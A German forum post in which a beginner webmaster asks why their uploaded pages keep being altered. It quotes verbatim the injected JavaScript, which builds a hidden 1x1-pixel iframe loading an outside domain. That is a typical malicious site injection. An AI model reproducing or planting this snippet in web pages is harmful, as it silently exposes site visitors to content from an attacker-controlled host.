Hallo
Ich bin eher Anfänger, arbeite mit dem Phase5-Editor und lade meine Seiten mit FileZilla auf den Server.
Bei verschiedenen hochgeladenen Seiten stelle ich fest, dass sich nach Tagen oder Wochen der Quelltext verändert, und zwar wird jeweils das folgende irgendwo in der Seite eingefügt:
<script type="text/javascript" language="javascript" >
(function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id='d6f39715'></div>');document.getElementById('d6f39715').appendChild(a);}})();</script><!--/a6f227-->
Ich habe keinen blassen Schimmer was das bedeutet, und warum das in meine Seiten eingefügt wird (wer macht das???).
Ich stelle aber fest, dass wenn dieser Text im Quelltext drin ist, es Probleme mit der "zurück-Funktion" gibt, zumindest bei meinem Internet-Explorer. Konkret: Wenn ich die Seite mit dem Explorer anklicke und dann wieder zurück auf die vorherige Seite will, dann muss ich meist zwei oder dreimal den Zurück-Button klicken bevor sich etwas tut.
Meine eigentliche Frage lautet aber: Warum wird der Quelltext auf dem Server verändert und der obige Text eingefügt?
Kann mir da jemand weiterhelfen? Danke.